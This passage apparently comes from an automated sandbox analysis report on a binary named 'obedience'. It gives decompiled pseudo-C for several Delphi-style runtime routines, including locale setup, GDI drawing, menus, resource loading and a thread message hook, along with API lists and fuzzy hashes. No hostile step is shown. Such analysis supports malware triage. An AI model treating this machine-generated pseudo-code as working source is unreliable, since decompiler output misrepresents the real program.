      					_v8 = E00404F00( *((intOrPtr*)(_t84 + 4)));
      					_t78 = E00409A44(_v8, _t97);
      					if(_t78 != 0) {
      						_t93 = _v8;
      						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
      							_v12 = 0x40cb20;
      						}
      					}
      				}
      				_t58 =  *0x48f9a8; // 0x407db4
      				_t21 = _t58 + 4; // 0xffea
      				_t60 =  *0x490664; // 0x400000
      				LoadStringA(E00405EC0(_t60, 0x104, _t93),  *_t21,  &_v794, 0x100);
      				E00403B40( *_t84,  &_v1120);
      				_v864 =  &_v1120;
      				_v860 = 4;
      				_v856 =  &_v277;
      				_v852 = 6;
      				_v848 = _v16;
      				_v844 = 5;
      				_v840 = _v8;
      				_v836 = 6;
      				_v832 = _v12;
      				_v828 = 6;
      				E0040A118(_t97, _a4, _t114, 4,  &_v864);
      				return E00409A44(_t97, _t97);
			}

      APIs
      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C9A8
      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C9CC
      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C9E7
      • LoadStringA.USER32 ref: 0040CA8B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileModuleName$LoadQueryStringVirtual
      • String ID:
      • API String ID: 3990497365-0
      • Opcode ID: 6ec185a326c87704143ca3701e600e979e123bf3cbd2c5c0e3f69ff1c2016a03
      • Instruction ID: 26f77d4a2fb8f7a7cd3c921adda5ecdb1b21b5b1503f4dc78aada34c6c7313cb
      • Opcode Fuzzy Hash: 6ec185a326c87704143ca3701e600e979e123bf3cbd2c5c0e3f69ff1c2016a03
      • Instruction Fuzzy Hash: 4D41FA71A002589FDB11DB69DC85BDEB7F8AB48304F0441FAA508E7291D778AF888F59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0040DBEC() {
      				char* _v28;
      				char _v156;
      				short _v414;
      				signed short _t16;
      				signed int _t18;
      				int _t20;
      				void* _t22;
      				void* _t25;
      				int _t26;
      				int _t30;
      				signed int _t34;
      				signed int _t35;
      				signed int _t36;
      				signed int _t41;
      				int* _t43;
      				short* _t44;
      				void* _t52;
      
      				 *0x490740 = 0x409;
      				 *0x490744 = 9;
      				 *0x490748 = 1;
      				_t16 = GetThreadLocale();
      				if(_t16 != 0) {
      					 *0x490740 = _t16;
      				}
      				if(_t16 != 0) {
      					 *0x490744 = _t16 & 0x3ff;
      					 *0x490748 = (_t16 & 0x0000ffff) >> 0xa;
      				}
      				memcpy(0x48e110, 0x40dd44, 8 << 2);
      				if( *0x48e0c8 != 2) {
      					_t18 = GetSystemMetrics(0x4a);
      					__eflags = _t18;
      					 *0x49074d = _t18 & 0xffffff00 | _t18 != 0x00000000;
      					_t20 = GetSystemMetrics(0x2a);
      					__eflags = _t20;
      					_t35 = _t34 & 0xffffff00 | _t20 != 0x00000000;
      					 *0x49074c = _t35;
      					__eflags = _t35;
      					if(__eflags != 0) {
      						return E0040DB74(__eflags, _t52);
      					}
      				} else {
      					_t22 = E0040DBD4();
      					if(_t22 != 0) {
      						 *0x49074d = 0;
      						 *0x49074c = 0;
      						return _t22;
      					}
      					E0040DB74(__eflags, _t52);
      					_t41 = 0x20;
      					_t25 = E00403724(0x48e110, 0x20, 0x40dd44);
      					_t36 = _t34 & 0xffffff00 | __eflags != 0x00000000;
      					 *0x49074c = _t36;
      					__eflags = _t36;
      					if(_t36 != 0) {
      						 *0x49074d = 0;
      						return _t25;
      					}
      					_t26 = 0x80;
      					_t43 =  &_v156;
      					do {
      						 *_t43 = _t26;
      						_t26 = _t26 + 1;
      						_t43 =  &(_t43[0]);
      						__eflags = _t26 - 0x100;
      					} while (_t26 != 0x100);
      					_v28 =  &_v156;
      					_t30 =  *0x490740; // 0x409
      					GetStringTypeA(_t30, 2, _v28, 0x80,  &_v414);
      					_t20 = 0x80;
      					_t44 =  &_v414;
      					while(1) {
      						__eflags =  *_t44 - 2;
      						_t41 = _t41 & 0xffffff00 |  *_t44 == 0x00000002;
      						 *0x49074d = _t41;
      						__eflags = _t41;
      						if(_t41 != 0) {
      							goto L17;
      						}
      						_t44 = _t44 + 2;
      						_t20 = _t20 - 1;
      						__eflags = _t20;
      						if(_t20 != 0) {
      							continue;
      						} else {
      							return _t20;
      						}
      						L18:
      					}
      				}
      				L17:
      				return _t20;
      				goto L18;
			}

      APIs
      • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040DCE6
      • GetThreadLocale.KERNEL32 ref: 0040DC16
        • Part of subcall function 0040DB74: GetCPInfo.KERNEL32(00000000,?), ref: 0040DB8D
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: InfoLocaleStringThreadType
      • String ID:
      • API String ID: 1505017576-0
      • Opcode ID: 9643e280fb3d119fd4ba62e4d82edf06eba3b03041eae01f82019c790613f910
      • Instruction ID: 022c4badb116a001143af62e3785d81e0892c8282bb3ca0fc826b292eeaf275d
      • Opcode Fuzzy Hash: 9643e280fb3d119fd4ba62e4d82edf06eba3b03041eae01f82019c790613f910
      • Instruction Fuzzy Hash: 0231D561D442548FD720D7E5AC017A6379AEB61364F4480BBE488AB3D2DB7C684CCB5E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 80%
      			E00470604(intOrPtr* __eax, intOrPtr __edx) {
      				intOrPtr* _v8;
      				intOrPtr _v12;
      				struct HDC__* _v16;
      				int _v20;
      				int _v24;
      				int _v28;
      				int _v32;
      				char _v44;
      				struct HDC__* _t39;
      				void* _t67;
      				intOrPtr _t87;
      				void* _t89;
      				void* _t91;
      				intOrPtr _t92;
      
      				_t89 = _t91;
      				_t92 = _t91 + 0xffffffd8;
      				_v12 = __edx;
      				_v8 = __eax;
      				_t69 = E00430DA8();
      				if(E00430EB0(_t32) == 0 ||  *(_v8 + 0x16c) <= 0) {
      					return E0044BFB0(_v8, _v12);
      				} else {
      					_t39 = E0044B158(_v8);
      					L00407768();
      					_v16 = _t39;
      					 *[fs:edx] = _t92;
      					 *((intOrPtr*)( *_v8 + 0x44))( *[fs:edx], 0x4706fa, _t89, _t39);
      					E00406E24( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
      					ExcludeClipRect(_v16, _v32, _v28, _v24, _v20);
      					SetWindowOrgEx(_v16,  ~( *(_v8 + 0x16c)),  ~( *(_v8 + 0x16c)), 0);
      					E00431054( &_v44, 0x2b);
      					E00430FB0(_t69, _v16, E0044B158(_v8), 0, 0,  &_v44);
      					_pop(_t87);
      					 *[fs:eax] = _t87;
      					_push(0x470701);
      					_push(_v16);
      					_t67 = E0044B158(_v8);
      					_push(_t67);
      					L004078C0();
      					return _t67;
      				}
			}

      APIs
      • 73BEB080.USER32(00000000), ref: 00470640
      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000), ref: 0047068A
      • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004706AD
      • 73BEB380.USER32(00000000,?,00470701,00000000,?,?,?,?,?,?,00000000), ref: 004706F4
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B080B380ClipExcludeRectWindow
      • String ID:
      • API String ID: 3245360159-0
      • Opcode ID: c56d43a01187abd7442fea925066739881520e030ecbb9362dd632b2860c0460
      • Instruction ID: cb319c9865a6b6c9c41e6cad574d07b30161efc8d19b111ead2b3264d56a2707
      • Opcode Fuzzy Hash: c56d43a01187abd7442fea925066739881520e030ecbb9362dd632b2860c0460
      • Instruction Fuzzy Hash: A8310075E04208EFDB00EBA9C991EEEB7F9EB49304F1085A6F505E7341D639AE058B54
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 64%
      			E00429D84(intOrPtr __eax, void* __edx) {
      				intOrPtr _v8;
      				void* __ebx;
      				void* __ecx;
      				void* __esi;
      				void* __ebp;
      				intOrPtr _t33;
      				struct HDC__* _t47;
      				intOrPtr _t54;
      				intOrPtr _t58;
      				struct HDC__* _t66;
      				void* _t67;
      				intOrPtr _t76;
      				void* _t81;
      				intOrPtr _t82;
      				intOrPtr _t84;
      				intOrPtr _t86;
      
      				_t84 = _t86;
      				_push(_t67);
      				_v8 = __eax;
      				_t33 = _v8;
      				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
      					return _t33;
      				} else {
      					E0042674C(_v8);
      					_push(_t84);
      					_push(0x429e63);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t86;
      					E0042B0A8( *((intOrPtr*)(_v8 + 0x58)));
      					E00429C00( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
      					_t47 = E0042B1A8( *((intOrPtr*)(_v8 + 0x58)));
      					_push(0);
      					L00407280();
      					_t66 = _t47;
      					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
      					if(_t81 == 0) {
      						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
      					} else {
      						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
      					}
      					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
      					_t82 =  *((intOrPtr*)(_t54 + 0x10));
      					if(_t82 == 0) {
      						 *((intOrPtr*)(_v8 + 0x60)) = 0;
      					} else {
      						_push(0xffffffff);
      						_push(_t82);
      						_push(_t66);
      						L00407420();
      						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
      						_push(_t66);
      						L004073F0();
      					}
      					E00426B80(_v8, _t66);
      					_t58 =  *0x48e77c; // 0x2480acc
      					E00419FE4(_t58, _t66, _t67, _v8, _t82);
      					_pop(_t76);
      					 *[fs:eax] = _t76;
      					_push(0x429e6a);
      					return E004269F8(_v8);
      				}
			}

      APIs
        • Part of subcall function 0042674C: RtlEnterCriticalSection.KERNEL32(004908C4,00000000,004251BE,00000000,0042521D), ref: 00426754
        • Part of subcall function 0042674C: RtlLeaveCriticalSection.KERNEL32(004908C4,004908C4,00000000,004251BE,00000000,0042521D), ref: 00426761
        • Part of subcall function 0042674C: RtlEnterCriticalSection.KERNEL32(00000038,004908C4,004908C4,00000000,004251BE,00000000,0042521D), ref: 0042676A
        • Part of subcall function 0042B1A8: 73BEAC50.USER32(00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B1FE
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B213
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B21D
        • Part of subcall function 0042B1A8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B241
        • Part of subcall function 0042B1A8: 73BEB380.USER32(00000000,00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B24C
      • 73BEA590.GDI32(00000000,00000000,00429E63), ref: 00429DD9
      • SelectObject.GDI32(00000000,?), ref: 00429DF2
      • 73BEB410.GDI32(00000000,?,000000FF,00000000,00000000,00429E63), ref: 00429E1B
      • 73BEB150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00429E63), ref: 00429E27
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
      • String ID:
      • API String ID: 2198039625-0
      • Opcode ID: 52627fab76bdb2200c5a2abc028d6a13087f29d4b66bad55b1ab170e390471a5
      • Instruction ID: e556636ed477f303664a25b8528dc576f5d8a5c54a15585e020bf312f5ea4973
      • Opcode Fuzzy Hash: 52627fab76bdb2200c5a2abc028d6a13087f29d4b66bad55b1ab170e390471a5
      • Instruction Fuzzy Hash: B1312B34B04624EFC704DB59D981D4EB3F5EF48714B6241AAF804AB362C734EE41DB84
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E004586A4(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
      				intOrPtr _v8;
      				void* __ecx;
      				void* __edi;
      				int _t27;
      				void* _t40;
      				int _t41;
      				int _t50;
      
      				_t50 = _t41;
      				_t49 = __edx;
      				_t40 = __eax;
      				if(E00457D80(__eax) == 0) {
      					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
      				}
      				_v8 = 0;
      				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
      					_t27 = GetMenuItemID(_t49, _t50);
      					_t51 = _t27;
      					if(_t27 != 0xffffffff) {
      						_v8 = E00457BFC(_t40, 0, _t51);
      					}
      				} else {
      					_t49 = GetSubMenu(_t49, _t50);
      					_v8 = E00457BFC(_t40, 1, _t37);
      				}
      				if(_v8 == 0) {
      					return 0;
      				} else {
      					 *_a12 = 0;
      					E00409B08(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
      					return E00409A44(_a12, _t49);
      				}
			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$ItemStateString
      • String ID:
      • API String ID: 306270399-0
      • Opcode ID: 958d28d622fcaabf2a5ae7125b84a55d10eeee537db7687794ce280936756176
      • Instruction ID: 999ae4a9b69dfb80c2ec330b75b30dde3c01bbf258ae47979e45758134e61beb
      • Opcode Fuzzy Hash: 958d28d622fcaabf2a5ae7125b84a55d10eeee537db7687794ce280936756176
      • Instruction Fuzzy Hash: 32117F31605104AFC700EE6D9C859AF77E8AF493A5B20443FFC09E7392DA38ED059769
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00463530(void* __eax, void* __ecx, char __edx) {
      				char _v12;
      				struct HWND__* _v20;
      				int _t17;
      				void* _t27;
      				void* _t28;
      				struct HWND__* _t33;
      				void* _t35;
      				void* _t36;
      				long _t37;
      
      				_t28 = __ecx;
      				_t37 = _t36 + 0xfffffff8;
      				_t27 = __eax;
      				_t17 =  *0x490b7c; // 0x2481268
      				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
      					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
      						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
      						_v12 = __edx;
      						EnumWindows(E004634C0, _t37);
      						_t17 =  *(_t27 + 0x90);
      						if( *((intOrPtr*)(_t17 + 8)) != 0) {
      							_t33 = GetWindow(_v20, 3);
      							_v20 = _t33;
      							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
      								_v20 = 0xfffffffe;
      							}
      							_t17 =  *(_t27 + 0x90);
      							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
      							if(_t35 >= 0) {
      								do {
      									_t17 = SetWindowPos(E00419C84( *(_t27 + 0x90), _t28, _t35), _v20, 0, 0, 0, 0, 0x213);
      									_t35 = _t35 - 1;
      								} while (_t35 != 0xffffffff);
      							}
      						}
      					}
      					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
      				}
      				return _t17;
			}

      APIs
      • EnumWindows.USER32(004634C0), ref: 00463565
      • GetWindow.USER32(00000003,00000003), ref: 0046357D
      • GetWindowLongA.USER32 ref: 0046358A
      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004635C9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$EnumLongWindows
      • String ID:
      • API String ID: 4191631535-0
      • Opcode ID: e8a1f66ca9543963858cbe399f1bdc0b8d48c36e9c6e804f18515e8b11975d2e
      • Instruction ID: 34ec1e0ab4b7ee6e973036d34b1632b8c977f34ba61956058d1254a6f56eae3d
      • Opcode Fuzzy Hash: e8a1f66ca9543963858cbe399f1bdc0b8d48c36e9c6e804f18515e8b11975d2e
      • Instruction Fuzzy Hash: 98117370608250AFD710EF2CCC85F96B3D4EB04729F15027AF958AB2D2D778AD40C75A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E0041CBBC(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
      				CHAR* _v8;
      				void* __ebx;
      				void* __ecx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t18;
      				void* _t23;
      				CHAR* _t24;
      				void* _t25;
      				struct HRSRC__* _t29;
      				void* _t30;
      				struct HINSTANCE__* _t31;
      				void* _t32;
      
      				_v8 = _t24;
      				_t31 = __edx;
      				_t23 = __eax;
      				_t29 = FindResourceA(__edx, _v8, _a4);
      				 *(_t23 + 0x10) = _t29;
      				_t33 = _t29;
      				if(_t29 == 0) {
      					E0041CB4C(_t23, _t24, _t29, _t31, _t33, _t32);
      					_pop(_t24);
      				}
      				_t5 = _t23 + 0x10; // 0x41cc60
      				_t30 = LoadResource(_t31,  *_t5);
      				 *(_t23 + 0x14) = _t30;
      				_t34 = _t30;
      				if(_t30 == 0) {
      					E0041CB4C(_t23, _t24, _t30, _t31, _t34, _t32);
      				}
      				_t7 = _t23 + 0x10; // 0x41cc60
      				_push(SizeofResource(_t31,  *_t7));
      				_t8 = _t23 + 0x14; // 0x41c8c8
      				_t18 = LockResource( *_t8);
      				_pop(_t25);
      				return E0041C888(_t23, _t25, _t18);
      			}

      0x0041cbc3
      0x0041cbc6
      0x0041cbc8
      0x0041cbd8
      0x0041cbda
      0x0041cbdd
      0x0041cbdf
      0x0041cbe2
      0x0041cbe7
      0x0041cbe7
      0x0041cbe8
      0x0041cbf2
      0x0041cbf4
      0x0041cbf7
      0x0041cbf9
      0x0041cbfc
      0x0041cc01
      0x0041cc02
      0x0041cc0c
      0x0041cc0d
      0x0041cc11
      0x0041cc1a
      0x0041cc25

      APIs
      • FindResourceA.KERNEL32(?,?,?), ref: 0041CBD3
      • LoadResource.KERNEL32(?,0041CC60,?,?,?,00417DE0,?,00000001,00000000,?,0041CADC,?), ref: 0041CBED
      • SizeofResource.KERNEL32(?,0041CC60,?,0041CC60,?,?,?,00417DE0,?,00000001,00000000,?,0041CADC,?), ref: 0041CC07
      • LockResource.KERNEL32(0041C8C8,00000000,?,0041CC60,?,0041CC60,?,?,?,00417DE0,?,00000001,00000000,?,0041CADC,?), ref: 0041CC11
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Resource$FindLoadLockSizeof
      • String ID:
      • API String ID: 3473537107-0
      • Opcode ID: c14ff8e6fa6f6f6645f93693a961653f50a190c8eef64b752231028638aa4508
      • Instruction ID: 9796dd7fd95931b729d06b7b52947e8421ad4d8ab94d6448901d75e807912902
      • Opcode Fuzzy Hash: c14ff8e6fa6f6f6645f93693a961653f50a190c8eef64b752231028638aa4508
      • Instruction Fuzzy Hash: A2F06DB26482046F9704EE6DAC82D9B77DCDE89364310016FF908DB346DA39ED4143B9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E00442678(struct HWND__* __eax, void* __ecx) {
      				intOrPtr _t9;
      				signed int _t16;
      				struct HWND__* _t19;
      				DWORD* _t20;
      
      				_t17 = __ecx;
      				_push(__ecx);
      				_t19 = __eax;
      				_t16 = 0;
      				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
      					_t9 =  *0x490aec; // 0x2480dd0
      					if(GlobalFindAtomA(E00404F00(_t9)) !=  *0x490ae8) {
      						_t16 = 0 | E004417B8(_t19, _t17) != 0x00000000;
      					} else {
      						_t16 = 0 | GetPropA(_t19,  *0x490ae8 & 0x0000ffff) != 0x00000000;
      					}
      				}
      				return _t16;
      			}

      0x00442678
      0x0044267a
      0x0044267b
      0x0044267d
      0x00442681
      0x00442698
      0x004426af
      0x004426cf
      0x004426b1
      0x004426c1
      0x004426c1
      0x004426af
      0x004426d7

      APIs
      • GetWindowThreadProcessId.USER32(00000000), ref: 00442685
      • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,004426F0,004424B2,00490B20,00000000,004422A2,?,-0000000C,?), ref: 0044268E
      • GlobalFindAtomA.KERNEL32(00000000), ref: 004426A3
      • GetPropA.USER32 ref: 004426BA
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
      • String ID:
      • API String ID: 2582817389-0
      • Opcode ID: 387dd020038ca6b7a403543475f0ada9f2241b0da58cf1419fdd78323efc1424
      • Instruction ID: 349a37b6f0d2aadfd1de078f283ef8f65be3a40d50ae6cb3781f493f57cda11d
      • Opcode Fuzzy Hash: 387dd020038ca6b7a403543475f0ada9f2241b0da58cf1419fdd78323efc1424
      • Instruction Fuzzy Hash: 5BF0E57261A2255BBB1177B76E41A7F118C9D60364381413FF800E6296DE2CDCD182BF
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E004417EC(struct HWND__* __eax, void* __ecx) {
      				intOrPtr _t5;
      				struct HWND__* _t12;
      				void* _t15;
      				DWORD* _t16;
      
      				_t13 = __ecx;
      				_push(__ecx);
      				_t12 = __eax;
      				_t15 = 0;
      				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
      					_t5 =  *0x490af0; // 0x2480dec
      					if(GlobalFindAtomA(E00404F00(_t5)) !=  *0x490aea) {
      						_t15 = E004417B8(_t12, _t13);
      					} else {
      						_t15 = GetPropA(_t12,  *0x490aea & 0x0000ffff);
      					}
      				}
      				return _t15;
      			}

      0x004417ec
      0x004417ee
      0x004417ef
      0x004417f1
      0x004417f5
      0x0044180c
      0x00441823
      0x0044183e
      0x00441825
      0x00441833
      0x00441833
      0x00441823
      0x00441845

      APIs
      • GetWindowThreadProcessId.USER32(00000000), ref: 004417F9
      • GetCurrentProcessId.KERNEL32(?,?,00000000,004642DF,?,?,?,00000001,0046444B,?,?,?,?), ref: 00441802
      • GlobalFindAtomA.KERNEL32(00000000), ref: 00441817
      • GetPropA.USER32 ref: 0044182E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
      • String ID:
      • API String ID: 2582817389-0
      • Opcode ID: 1d459b63cf46a2fd0c7c1b090ccc389f970030f4000cafa30075405610327087
      • Instruction ID: 7e399faec5378e9c9ba2174e6606955be3c26f48c0a4cef2339024d059ae8ea4
      • Opcode Fuzzy Hash: 1d459b63cf46a2fd0c7c1b090ccc389f970030f4000cafa30075405610327087
      • Instruction Fuzzy Hash: E7F06561A142116EEB2077B65C82D6B15CC89653E4340053BF901E7363ED3CEC8183FE
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00462E2C(void* __ecx) {
      				void* _t2;
      				DWORD* _t7;
      
      				_t2 =  *0x490b7c; // 0x2481268
      				if( *((char*)(_t2 + 0xa5)) == 0) {
      					if( *0x490b94 == 0) {
      						_t2 = SetWindowsHookExA(3, E00462DE8, 0, GetCurrentThreadId());
      						 *0x490b94 = _t2;
      					}
      					if( *0x490b90 == 0) {
      						_t2 = CreateEventA(0, 0, 0, 0);
      						 *0x490b90 = _t2;
      					}
      					if( *0x490b98 == 0) {
      						_t2 = CreateThread(0, 0x3e8, E00462D8C, 0, 0, _t7);
      						 *0x490b98 = _t2;
      					}
      				}
      				return _t2;
      			}

      0x00462e2d
      0x00462e39
      0x00462e42
      0x00462e54
      0x00462e59
      0x00462e59
      0x00462e65
      0x00462e6f
      0x00462e74
      0x00462e74
      0x00462e80
      0x00462e93
      0x00462e98
      0x00462e98
      0x00462e80
      0x00462e9e

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 00462E44
      • SetWindowsHookExA.USER32 ref: 00462E54
      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00465961,?,?,02481268,00000000,?,004652E4,?), ref: 00462E6F
      • CreateThread.KERNEL32 ref: 00462E93
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateThread$CurrentEventHookWindows
      • String ID:
      • API String ID: 1195359707-0
